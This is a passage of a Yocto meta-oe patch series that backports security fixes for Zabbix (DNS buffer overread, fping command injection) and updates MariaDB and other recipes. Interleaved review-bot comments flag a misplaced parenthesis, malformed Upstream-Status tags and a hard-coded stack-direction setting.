@@ -0,0 +1,160 @@ +From 53ef2b7119f57f4140e6bd9c5cd2d3c6af228179 Mon Sep 17 00:00:00 2001 +From: Armands Arseniuss Skolmeisters <armands.skolmeisters@zabbix.com> +Date: Thu, 11 Jan 2024 12:00:24 +0000 +Subject: [PATCH] ...G...... [DEV-2702] fixed buffer overread in DNS response + +* commit '893902999ab7f0b15cce91e8555cb251b32b6df4': + ...G...... [DEV-2702] fixed DNS record data length check + ...G...... [DEV-2702] improved DNS error messages + ...G...... [DEV-2702] fixed DNS error messages + ...G...... [DEV-2702] improved DNS error messages + ...G...... [DEV-2702] fixed buffer overread in DNS response + +CVE: CVE-2023-32726 +Upstream-Status: Backport [https://github.com/zabbix/zabbix/commit/53ef2b7119f57f4140e6bd9c5cd2d3c6af228179] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/libs/zbxsysinfo/common/dns.c | 65 +++++++++++++++++++++++++++----- + 1 file changed, 56 insertions(+), 9 deletions(-) + +diff --git a/src/libs/zbxsysinfo/common/dns.c b/src/libs/zbxsysinfo/common/dns.c +index e8938d8..bf456f2 100644 +--- a/src/libs/zbxsysinfo/common/dns.c ++++ b/src/libs/zbxsysinfo/common/dns.c +@@ -638,7 +638,8 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + { + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, ++ "Cannot decode DNS response: cannot expand domain name.")); + ret = SYSINFO_RET_FAIL; + goto clean; + } +@@ -651,6 +652,13 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + GETSHORT(q_len, msg_ptr); + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %-8s", decode_type(q_type)); + ++ if (msg_ptr + q_len > msg_end) ++ { ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response: record overflow.")); ++ ret = SYSINFO_RET_FAIL; ++ goto clean; ++ } ++ + switch (q_type) + { + case T_A: +@@ -695,8 +703,40 @@ 
static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + case T_PTR: + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++#define ERR_MSG_PREFIX "Cannot decode DNS response: cannot expand " ++ const char *err_msg = NULL; ++ ++ switch (q_type) ++ { ++ case T_NS: ++ err_msg = ERR_MSG_PREFIX "name server name."; ++ break; ++ case T_CNAME: ++ err_msg = ERR_MSG_PREFIX "canonical name."; ++ break; ++ case T_MB: ++ err_msg = ERR_MSG_PREFIX "mailbox name."; ++ break; ++ case T_MD: ++ err_msg = ERR_MSG_PREFIX "mail destination name."; ++ break; ++ case T_MF: ++ err_msg = ERR_MSG_PREFIX "mail forwarder name."; ++ break; ++ case T_MG: ++ err_msg = ERR_MSG_PREFIX "mail group name."; ++ break; ++ case T_MR: ++ err_msg = ERR_MSG_PREFIX "renamed mailbox name."; ++ break; ++ case T_PTR: ++ err_msg = ERR_MSG_PREFIX "PTR name."; ++ break; ++ } ++ ++ SET_MSG_RESULT(result, zbx_strdup(NULL, err_msg)); + return SYSINFO_RET_FAIL; ++#undef ERR_MSG_PREFIX + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); + break; +@@ -706,7 +746,8 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* exchange */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " cannot expand mail exchange name.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); +@@ -715,14 +756,16 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + case T_SOA: + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* source host */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode 
DNS response:" ++ " cannot expand source nameserver name.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); + + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* administrator */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " cannot expand administrator mailbox name.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); +@@ -750,7 +793,8 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + case T_WKS: + if (INT32SZ + 1 > q_len) + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " malformed WKS resource record.")); + return SYSINFO_RET_FAIL; + } + +@@ -816,14 +860,16 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + case T_MINFO: + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* mailbox responsible for mailing lists */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " cannot expand mailbox responsible for mailing lists.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); + + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* mailbox for error messages */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " cannot expand mailbox for error messages.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); +@@ -854,7 +900,8 @@ static int dns_query(AGENT_REQUEST *request, 
AGENT_RESULT *result, int short_ans + + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* target */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " cannot expand service target hostname.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); +-- +2.40.0 diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0001.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0001.patch new file mode 100644 index 0000000000..5c1e0c5af6 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0001.patch 
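Review bot: The new `msg_ptr + q_len > msg_end` check in the added CVE-2023-32726.patch bounds only the record data. The fixed-size fields read before it (`GETSHORT(q_len, msg_ptr)` in the context, and whatever precedes it outside the hunk) are not visibly checked against `msg_end`. A response truncated inside the record header may therefore still be read before this check runs; this should be confirmed against the full dns_query body. The comparison is also safer written on lengths, `if (msg_end - msg_ptr < q_len)`, which avoids forming a pointer past the end of the buffer.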
@@ -0,0 +1,193 @@ +From 93e090592fc6de7ec5d3d42c1bb9074ad1f3ba34 Mon Sep 17 00:00:00 2001 +From: Andris Zeila <andris.zeila@zabbix.com> +Date: Fri, 12 Jan 2024 05:48:31 +0000 +Subject: [PATCH] .......PS. [DEV-2695] changed fping tests to read address + from file + +Merge in ZBX/zabbix from feature/DEV-2695-6.0 to release/6.0 + +* commit '6603893ff94620e28fc543d5d0d4c86b9be3342e': + .......PS. [DEV-2695] fixed signal blocking + .......PS. [DEV-2695] added target hostname/ip validation in fping feature tests + .......PS. [DEV-2695] added error messages when failed to prepare temporary file for fping tests + .......PS. [DEV-2695] changed fping tests to read address from file + +CVE: CVE-2023-32727 +Upstream-Status: BAckport [https://github.com/zabbix/zabbix/commit/93e090592fc6de7ec5d3d42c1bb9074ad1f3ba34] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/libs/zbxicmpping/icmpping.c | 125 ++++++++++++++++++++++++++++---- + 1 file changed, 112 insertions(+), 13 deletions(-) + +diff --git a/src/libs/zbxicmpping/icmpping.c b/src/libs/zbxicmpping/icmpping.c +index 72f7e86..9a751b7 100644 +--- a/src/libs/zbxicmpping/icmpping.c ++++ b/src/libs/zbxicmpping/icmpping.c +@@ -59,6 +59,8 @@ static void get_source_ip_option(const char *fping, const char **option, unsigne + + zbx_snprintf(tmp, sizeof(tmp), "%s -h 2>&1", fping); + ++ zabbix_log(LOG_LEVEL_DEBUG, "executing %s", tmp); ++ + if (NULL == (f = popen(tmp, "r"))) + return; + +@@ -85,6 +87,110 @@ static void get_source_ip_option(const char *fping, const char **option, unsigne + *checked = 1; + } + ++/****************************************************************************** ++ * * ++ * Purpose: execute external program and return stdout and stderr values * ++ * * ++ * Parameters: fping - [IN] location of fping program * ++ * out - [OUT] stdout and stderr values * ++ * error - [OUT] error string if function fails * ++ * max_error_len - [IN] length of error buffer * ++ * * ++ * Return value: SUCCEED if 
processed successfully or FAIL otherwise * ++ * * ++ ******************************************************************************/ ++static int get_fping_out(const char *fping, const char *address, char **out, char *error, size_t max_error_len) ++{ ++ FILE *f; ++ size_t buf_size = 0, offset = 0, len; ++ ssize_t n; ++ char tmp[MAX_STRING_LEN], *buffer = NULL; ++ int ret = FAIL, fd; ++ sigset_t mask, orig_mask; ++ char filename[MAX_STRING_LEN]; ++ ++ if (FAIL == zbx_validate_hostname(address) && FAIL == is_supported_ip(address)) ++ { ++ zbx_strlcpy(error, "Invalid host name or IP address", max_error_len); ++ return FAIL; ++ } ++ ++ zbx_snprintf(filename, sizeof(filename), "%s/%s_XXXXXX", CONFIG_TMPDIR, progname); ++ if (-1 == (fd = mkstemp(filename))) ++ { ++ zbx_snprintf(error, max_error_len, "Cannot create temporary file \"%s\": %s", filename, ++ zbx_strerror(errno)); ++ ++ return FAIL; ++ } ++ ++ sigemptyset(&mask); ++ sigaddset(&mask, SIGINT); ++ sigaddset(&mask, SIGQUIT); ++ ++ len = strlen(address); ++ if (-1 == (n = write(fd, address, len))) ++ { ++ zbx_snprintf(error, max_error_len, "Cannot write address into temporary file: %s", zbx_strerror(errno)); ++ (void)close(fd); ++ goto out; ++ } ++ ++ if (n != (ssize_t)len) ++ { ++ zbx_strlcpy(error, "Cannot write full address into temporary file", max_error_len); ++ (void)close(fd); ++ goto out; ++ } ++ ++ if (-1 == close(fd)) ++ { ++ zbx_snprintf(error, max_error_len, "Cannot close temporary file: %s", zbx_strerror(errno)); ++ goto out; ++ } ++ ++ zbx_snprintf(tmp, sizeof(tmp), "%s 2>&1 < %s", fping, filename); ++ ++ if (0 > sigprocmask(SIG_BLOCK, &mask, &orig_mask)) ++ zbx_error("cannot set sigprocmask to block the user signal"); ++ ++ zabbix_log(LOG_LEVEL_DEBUG, "executing %s", tmp); ++ ++ if (NULL == (f = popen(tmp, "r"))) ++ { ++ zbx_strlcpy(error, zbx_strerror(errno), max_error_len); ++ goto out; ++ } ++ ++ while (NULL != zbx_fgets(tmp, sizeof(tmp), f)) ++ { ++ len = strlen(tmp); ++ ++ if 
(MAX_EXECUTE_OUTPUT_LEN < offset + len) ++ break; ++ ++ zbx_strncpy_alloc(&buffer, &buf_size, &offset, tmp, len); ++ } ++ ++ pclose(f); ++ ++ if (NULL == buffer) ++ { ++ zbx_strlcpy(error, "Cannot obtain the program output", max_error_len); ++ goto out; ++ } ++ ++ *out = buffer; ++ ret = SUCCEED; ++out: ++ unlink(filename); ++ ++ if (0 > sigprocmask(SIG_SETMASK, &orig_mask, NULL)) ++ zbx_error("cannot restore sigprocmask"); ++ ++ return ret; ++} ++ + /****************************************************************************** + * * + * Function: get_interval_option * +@@ -137,19 +243,12 @@ static int get_interval_option(const char *fping, ZBX_FPING_HOST *hosts, int hos + + zabbix_log(LOG_LEVEL_DEBUG, "testing fping interval %u ms", intervals[j]); + +- zbx_snprintf(tmp, sizeof(tmp), "%s -c1 -t50 -i%u %s", fping, intervals[j], dst); ++ zbx_snprintf(tmp, sizeof(tmp), "%s -c1 -t50 -i%u", fping, intervals[j]); + + zbx_free(out); + + /* call fping, ignore its exit code but mind execution failures */ +- if (TIMEOUT_ERROR == (ret_exec = zbx_execute(tmp, &out, err, sizeof(err), 1, +- ZBX_EXIT_CODE_CHECKS_DISABLED, NULL))) +- { +- zbx_snprintf(error, max_error_len, "Timeout while executing \"%s\"", tmp); +- goto out; +- } +- +- if (FAIL == ret_exec) ++ if (SUCCEED != (ret_exec = get_fping_out(tmp, dst, &out, err, sizeof(err)))) + { + zbx_snprintf(error, max_error_len, "Cannot execute \"%s\": %s", tmp, err); + goto out; +@@ -251,10 +350,10 @@ static int get_ipv6_support(const char * fping, const char *dst) + int ret; + char tmp[MAX_STRING_LEN], error[255], *out = NULL; + +- zbx_snprintf(tmp, sizeof(tmp), "%s -6 -c1 -t50 %s", fping, dst); ++ zbx_snprintf(tmp, sizeof(tmp), "%s -6 -c1 -t50", fping); + +- if ((SUCCEED == (ret = zbx_execute(tmp, &out, error, sizeof(error), 1, ZBX_EXIT_CODE_CHECKS_DISABLED, NULL)) && +- ZBX_KIBIBYTE > strlen(out) && NULL != strstr(out, dst)) || TIMEOUT_ERROR == ret) ++ if (SUCCEED == (ret = get_fping_out(tmp, dst, &out, error, sizeof(error)) && 
++ ZBX_KIBIBYTE > strlen(out) && NULL != strstr(out, dst))) + { + ret = SUCCEED; + } +@@ -538,7 +637,7 @@ static int process_ping(ZBX_FPING_HOST *hosts, int hosts_count, int count, int i + + fclose(f); + +- zabbix_log(LOG_LEVEL_DEBUG, "%s", tmp); ++ zabbix_log(LOG_LEVEL_DEBUG, "executing %s", tmp); + + sigemptyset(&mask); + sigaddset(&mask, SIGINT); +-- +2.40.0 diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0002.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0002.patch new file mode 100644 index 0000000000..aabc675b6a --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0002.patch 
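Review bot: In the get_ipv6_support hunk of the added CVE-2023-32727_0001.patch, the parenthesis that closes the assignment sits after the whole `&&` chain. As a result `ret` receives the 0/1 result of `get_fping_out(...) && ZBX_KIBIBYTE > strlen(out) && NULL != strstr(out, dst)` instead of the return code. Assuming SUCCEED is 0 and FAIL is non-zero as elsewhere in Zabbix, a successful run short-circuits and is accepted without the output checks, while a failed run goes on to call `strlen(out)` with `out` still NULL. The assignment should close before the first `&&`: `if (SUCCEED == (ret = get_fping_out(tmp, dst, &out, error, sizeof(error))) && ZBX_KIBIBYTE > strlen(out) && NULL != strstr(out, dst))`. If the backport is meant to match upstream byte for byte, check whether a later upstream commit corrects this and carry it as well.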
@@ -0,0 +1,49 @@ +From 610f9fdbb86667f4094972547deb936c6cdfc6d5 Mon Sep 17 00:00:00 2001 +From: Andris Zeila <andris.zeila@zabbix.com> +Date: Fri, 12 Jan 2024 06:06:02 +0000 +Subject: [PATCH] .......PS. [DEV-2695] removed group/all access flags for + fping temporary files + +Merge in ZBX/zabbix from feature/DEV-2695-6.5 to master + +* commit 'cf07db1d5c2b8fe4a9de85fed22cf05035e08914': + .......PS. [DEV-2695] remove group/all access flags when creating fping input file for testing fping features + +(cherry picked from commit cd12f0a2d89c3ef05f0e9f50dcb73fdaf3a7e8a9) + +CVE: CVE-2023-32727 +Upstream_Status: Backport [https://github.com/zabbix/zabbix/commit/610f9fdbb86667f4094972547deb936c6cdfc6d5] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/libs/zbxicmpping/icmpping.c | 8 +++++++- + 1 file changed, 7 insertions(+), 1 deletion(-) + +diff --git a/src/libs/zbxicmpping/icmpping.c b/src/libs/zbxicmpping/icmpping.c +index 9a751b7..bab3d09 100644 +--- a/src/libs/zbxicmpping/icmpping.c ++++ b/src/libs/zbxicmpping/icmpping.c +@@ -108,6 +108,7 @@ static int get_fping_out(const char *fping, const char *address, char **out, cha + int ret = FAIL, fd; + sigset_t mask, orig_mask; + char filename[MAX_STRING_LEN]; ++ mode_t mode; + + if (FAIL == zbx_validate_hostname(address) && FAIL == is_supported_ip(address)) + { +@@ -116,7 +117,12 @@ static int get_fping_out(const char *fping, const char *address, char **out, cha + } + + zbx_snprintf(filename, sizeof(filename), "%s/%s_XXXXXX", CONFIG_TMPDIR, progname); +- if (-1 == (fd = mkstemp(filename))) ++ ++ mode = umask(077); ++ fd = mkstemp(filename); ++ umask(mode); ++ ++ if (-1 == fd) + { + zbx_snprintf(error, max_error_len, "Cannot create temporary file \"%s\": %s", filename, + zbx_strerror(errno)); +-- +2.40.0 diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix_5.4.12.bb b/meta-oe/recipes-connectivity/zabbix/zabbix_5.4.12.bb index f5d89d6c3d..2793f0ca5f 100644 
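Review bot: The tag line in the added CVE-2023-32727_0002.patch reads `Upstream_Status: Backport [...]` with an underscore, and CVE-2023-32727_0001.patch has `Upstream-Status: BAckport`. Tooling that parses patch headers for the exact `Upstream-Status:` key and its status values may not recognise either spelling, so these security backports can end up reported as untracked. Both should read `Upstream-Status: Backport [<commit URL>]`. CVE-2023-29451.patch also splits the tag across two lines, with the URL on the line after `Backport`; keeping it on one line matches the other patches in this commit.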
--- a/meta-oe/recipes-connectivity/zabbix/zabbix_5.4.12.bb +++ b/meta-oe/recipes-connectivity/zabbix/zabbix_5.4.12.bb @@ -26,6 +26,14 @@ PACKAGE_ARCH = "${MACHINE_ARCH}" SRC_URI = "https://cdn.zabbix.com/zabbix/sources/stable/5.4/${BPN}-${PV}.tar.gz \ file://0001-Fix-configure.ac.patch \ file://zabbix-agent.service \ + file://CVE-2022-43515.patch \ + file://CVE-2022-46768.patch \ + file://CVE-2023-29451.patch \ + file://CVE-2023-29449.patch \ + file://CVE-2023-29450.patch \ + file://CVE-2023-32726.patch \ + file://CVE-2023-32727_0001.patch \ + file://CVE-2023-32727_0002.patch \ " SRC_URI[md5sum] = "f295fd2df86143d72f6ff26e47d9e39e" diff --git a/meta-oe/recipes-connectivity/zeromq/czmq_4.2.1.bb b/meta-oe/recipes-connectivity/zeromq/czmq_4.2.1.bb index 86fde7ccfb..ce9d758d9f 100644 --- a/meta-oe/recipes-connectivity/zeromq/czmq_4.2.1.bb +++ b/meta-oe/recipes-connectivity/zeromq/czmq_4.2.1.bb @@ -30,8 +30,6 @@ PACKAGECONFIG[nss] = "-DCZMQ_WITH_NSS=ON,-DCZMQ_WITH_NSS=OFF,nss" PACKAGECONFIG[systemd] = "-DCZMQ_WITH_SYSTEMD=ON,-DCZMQ_WITH_SYSTEMD=OFF,systemd" PACKAGECONFIG[uuid] = "-DCZMQ_WITH_UUID=ON,-DCZMQ_WITH_UUID=OFF,util-linux" -BBCLASSEXTEND = "nativesdk" - do_install:append() { mkdir -p ${D}/${includedir}/${BPN} mv ${D}/${includedir}/sha1.h ${D}/${includedir}/${BPN}/. diff --git a/meta-oe/recipes-core/dbus-cxx/dbus-cxx_2.1.0.bb b/meta-oe/recipes-core/dbus-cxx/dbus-cxx_2.1.0.bb index c8dabc5ead..44804545de 100644 --- a/meta-oe/recipes-core/dbus-cxx/dbus-cxx_2.1.0.bb +++ b/meta-oe/recipes-core/dbus-cxx/dbus-cxx_2.1.0.bb @@ -9,7 +9,7 @@ SRC_URI = "git://github.com/dbus-cxx/dbus-cxx.git;branch=master;protocol=https \ file://0001-Include-typeinfo-for-typeid.patch \ file://0001-include-utility-header.patch \ " -SRC_URI:append:libc-musl = "file://fix_build_musl.patch" +SRC_URI:append:libc-musl = " file://fix_build_musl.patch" SRCREV = "73532d6a5faae9c721c2cc9535b8ef32d4d18264" DEPENDS = "\ 
diff --git a/meta-oe/recipes-core/emlog/emlog.inc b/meta-oe/recipes-core/emlog/emlog.inc index 824787083a..9d48e9cba3 100644 --- a/meta-oe/recipes-core/emlog/emlog.inc +++ b/meta-oe/recipes-core/emlog/emlog.inc @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" SRC_URI = "git://github.com/nicupavel/emlog.git;protocol=http;branch=master;protocol=https" SRCREV = "aee53e8dee862f35291242ba41b0ca88010f6c71" - +PV = "0.70+git${SRCPV}" S = "${WORKDIR}/git" EXTRA_OEMAKE += " \ diff --git a/meta-oe/recipes-core/emlog/emlog_git.bb b/meta-oe/recipes-core/emlog/emlog_git.bb index 05fa0c334c..2ded3e204f 100644 --- a/meta-oe/recipes-core/emlog/emlog_git.bb +++ b/meta-oe/recipes-core/emlog/emlog_git.bb @@ -34,4 +34,6 @@ CVE_CHECK_IGNORE += "\ CVE-2019-17073 \ CVE-2021-44584 \ CVE-2022-1526 \ + CVE-2022-3968 \ + CVE-2023-43291 \ " diff --git a/meta-oe/recipes-core/sdbus-c++/sdbus-c++_1.0.0.bb b/meta-oe/recipes-core/sdbus-c++/sdbus-c++_1.0.0.bb index 76fd6b65b1..6fd826cbbd 100644 --- a/meta-oe/recipes-core/sdbus-c++/sdbus-c++_1.0.0.bb +++ b/meta-oe/recipes-core/sdbus-c++/sdbus-c++_1.0.0.bb @@ -39,6 +39,11 @@ do_install:append() { fi } -PTEST_PATH = "${libdir}/${BPN}/tests" +PTEST_PATH = "${libdir}/${BPN}/ptest" +do_install_ptest() { + install -d ${D}${PTEST_PATH} + cp -r ${B}/tests/sdbus-c++-unit-tests ${D}${PTEST_PATH} +} + FILES:${PN}-ptest =+ "${sysconfdir}/dbus-1/system.d/" FILES:${PN}-dev += "${bindir}/sdbus-c++-xml2cpp" diff --git a/meta-oe/recipes-crypto/fsverity-utils/fsverity-utils_1.5.bb b/meta-oe/recipes-crypto/fsverity-utils/fsverity-utils_1.5.bb index c95a5b2d32..1c2c6e21e0 100644 --- a/meta-oe/recipes-crypto/fsverity-utils/fsverity-utils_1.5.bb +++ b/meta-oe/recipes-crypto/fsverity-utils/fsverity-utils_1.5.bb 
@@ -16,7 +16,7 @@ S = "${WORKDIR}/git" DEPENDS = "openssl" -EXTRA_OEMAKE:append = "PREFIX=${prefix} LIBDIR=${libdir} USE_SHARED_LIB=1" +EXTRA_OEMAKE:append = " PREFIX=${prefix} LIBDIR=${libdir} USE_SHARED_LIB=1" # We want to statically link the binary to libfsverity on native Windows EXTRA_OEMAKE:remove:mingw32:class-nativesdk = "USE_SHARED_LIB=1" EXTRA_OEMAKE:remove:mingw32:class-native = "USE_SHARED_LIB=1" diff --git a/meta-oe/recipes-dbs/mysql/mariadb-native_10.7.4.bb b/meta-oe/recipes-dbs/mysql/mariadb-native_10.7.8.bb index e38726d3f9..17a06349b0 100644 --- a/meta-oe/recipes-dbs/mysql/mariadb-native_10.7.4.bb +++ b/meta-oe/recipes-dbs/mysql/mariadb-native_10.7.8.bb @@ -2,7 +2,9 @@ require mariadb.inc inherit native PROVIDES += "mysql5-native" -DEPENDS = "ncurses-native zlib-native bison-native libpcre2-native" +DEPENDS = "ncurses-native zlib-native bison-native libpcre2-native \ +gnutls-native fmt-native \ +" RDEPENDS:${PN} = "" PACKAGES = "" diff --git a/meta-oe/recipes-dbs/mysql/mariadb.inc b/meta-oe/recipes-dbs/mysql/mariadb.inc index 922373b633..7c4b0a467f 100644 --- a/meta-oe/recipes-dbs/mysql/mariadb.inc +++ b/meta-oe/recipes-dbs/mysql/mariadb.inc @@ -19,11 +19,14 @@ SRC_URI = "https://archive.mariadb.org/${BP}/source/${BP}.tar.gz \ file://ssize_t.patch \ file://mm_malloc.patch \ file://sys_futex.patch \ - file://mariadb-openssl3.patch \ + file://cross-compiling.patch \ + file://0001-sql-CMakeLists.txt-fix-gen_lex_hash-not-found.patch \ + file://0001-MDEV-29644-a-potential-bug-of-null-pointer-dereferen.patch \ + file://CVE-2023-22084.patch \ " SRC_URI:append:libc-musl = " file://ppc-remove-glibc-dep.patch" -SRC_URI[sha256sum] = "73dd9c9d325520f20ca5e0ef16f94b7be1146bed7e4a78e735c20daebf3a4173" +SRC_URI[sha256sum] = "f8c69d9080d85eafb3e3a84837bfa566a7f5527a8af6f9a081429d4de0de4778" UPSTREAM_CHECK_URI = "https://github.com/MariaDB/server/releases" 
@@ -61,6 +64,8 @@ FILES:${PN}-setupdb = "${sysconfdir}/init.d/install_db \ ${bindir}/mysql-systemd-start \ " +EXTRA_OEMAKE = "'GEN_LEX_HASH=${STAGING_BINDIR_NATIVE}/gen_lex_hash'" + PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'pam', d)} openssl" PACKAGECONFIG:class-native = "" PACKAGECONFIG[pam] = ",-DWITHOUT_AUTH_PAM=TRUE,libpam" @@ -95,9 +100,9 @@ EXTRA_OECMAKE = "-DWITH_EMBEDDED_SERVER=ON \ -DINSTALL_SYSCONFDIR:PATH=${sysconfdir} \ -DMYSQL_DATADIR:PATH=/var/mysql \ -DCAT_EXECUTABLE=`which cat` \ + -DSTACK_DIRECTION=1 \ -DCMAKE_AR:FILEPATH=${AR}" -EXTRA_OECMAKE:prepend:class-target = "-DCMAKE_CROSSCOMPILING_EMULATOR=${WORKDIR}/qemuwrapper " # With Ninja it fails with: # make: *** No rule to make target `install'. Stop. @@ -121,18 +126,12 @@ do_generate_toolchain_file:append:class-native () { sed -i "/set( CMAKE_SYSTEM_PROCESSOR/d" ${WORKDIR}/toolchain.cmake } -do_configure:prepend:class-target () { - # Write out a qemu wrapper that will be used by cmake - # so that it can run target helper binaries through that. - qemu_binary="${@qemu_wrapper_cmdline(d, d.getVar('STAGING_DIR_HOST'), [d.expand('${STAGING_DIR_HOST}${libdir}'),d.expand('${STAGING_DIR_HOST}${base_libdir}')])}" - cat > ${WORKDIR}/qemuwrapper << EOF -#!/bin/sh -$qemu_binary "\$@" -EOF - chmod +x ${WORKDIR}/qemuwrapper -} do_compile:prepend:class-target () { + # These need to be in-tree or make will think they need to be built, + # and since we're cross-compiling that is disabled + cp ${STAGING_BINDIR_NATIVE}/comp_err ${S}/extra + cp ${STAGING_BINDIR_NATIVE}/comp_sql ${S}/scripts if [ "${@bb.utils.contains('PACKAGECONFIG', 'krb5', 'yes', 'no', d)}" = "no" ]; then if ! [ -e ${B}/include/openssl/kssl.h ] ; then mkdir -p ${B}/include/openssl 
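Review bot: `-DSTACK_DIRECTION=1` in the EXTRA_OECMAKE hunk of mariadb.inc is hard-coded for every target, presumably because the configure-time probe can no longer run once the qemu wrapper is removed later in this file. As far as I know, MariaDB derives its used-stack calculation for the stack-overrun guard from the sign of this value, so a value that does not match the target's stack growth direction could leave that guard ineffective. Please confirm the value for the architectures this layer supports. It would also help to record the reasoning next to the setting, for example `# STACK_DIRECTION must be given explicitly when cross-compiling; <value> because <reason>`.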
diff --git a/meta-oe/recipes-dbs/mysql/mariadb/0001-MDEV-29644-a-potential-bug-of-null-pointer-dereferen.patch b/meta-oe/recipes-dbs/mysql/mariadb/0001-MDEV-29644-a-potential-bug-of-null-pointer-dereferen.patch new file mode 100644 index 0000000000..2fe768d754 --- /dev/null +++ b/meta-oe/recipes-dbs/mysql/mariadb/0001-MDEV-29644-a-potential-bug-of-null-pointer-dereferen.patch 
@@ -0,0 +1,320 @@ +From b98375f9df0b024857c03c03bc3e73e8ced8d772 Mon Sep 17 00:00:00 2001 +From: Nayuta Yanagisawa <nayuta.yanagisawa@hey.com> +Date: Tue, 27 Sep 2022 15:22:57 +0900 +Subject: [PATCH] MDEV-29644 a potential bug of null pointer dereference in + spider_db_mbase::print_warnings() + +The function spider_db_mbase::print_warnings() can potentially result +in a null pointer dereference. + +Remove the null pointer dereference by cleaning up the function. + +Some small changes to the original commit +422fb63a9bbee35c50b6c7be19d199afe0bc98fa. + +CVE: CVE-2022-47015 + +Upstream-Status: Backport [https://github.com/MariaDB/server/commit/b98375f9df0] + +Co-Authored-By: Yuchen Pei <yuchen.pei@mariadb.com> +Signed-off-by: Mingli Yu <mingli.yu@windriver.com> +--- + .../spider/bugfix/r/mdev_29644.result | 41 ++++++ + .../mysql-test/spider/bugfix/t/mdev_29644.cnf | 3 + + .../spider/bugfix/t/mdev_29644.test | 56 ++++++++ + storage/spider/spd_db_mysql.cc | 124 ++++++++---------- + storage/spider/spd_db_mysql.h | 2 +- + 5 files changed, 154 insertions(+), 72 deletions(-) + create mode 100644 storage/spider/mysql-test/spider/bugfix/r/mdev_29644.result + create mode 100644 storage/spider/mysql-test/spider/bugfix/t/mdev_29644.cnf + create mode 100644 storage/spider/mysql-test/spider/bugfix/t/mdev_29644.test + +diff --git a/storage/spider/mysql-test/spider/bugfix/r/mdev_29644.result b/storage/spider/mysql-test/spider/bugfix/r/mdev_29644.result +new file mode 100644 +index 00000000000..b52cecc5bb7 +--- /dev/null ++++ b/storage/spider/mysql-test/spider/bugfix/r/mdev_29644.result +@@ -0,0 +1,41 @@ ++# ++# MDEV-29644 a potential bug of null pointer dereference in spider_db_mbase::print_warnings() ++# ++for master_1 ++for child2 ++child2_1 ++child2_2 ++child2_3 ++for child3 ++connection child2_1; ++CREATE DATABASE auto_test_remote; ++USE auto_test_remote; ++CREATE TABLE tbl_a ( ++a CHAR(5) ++) ENGINE=InnoDB DEFAULT 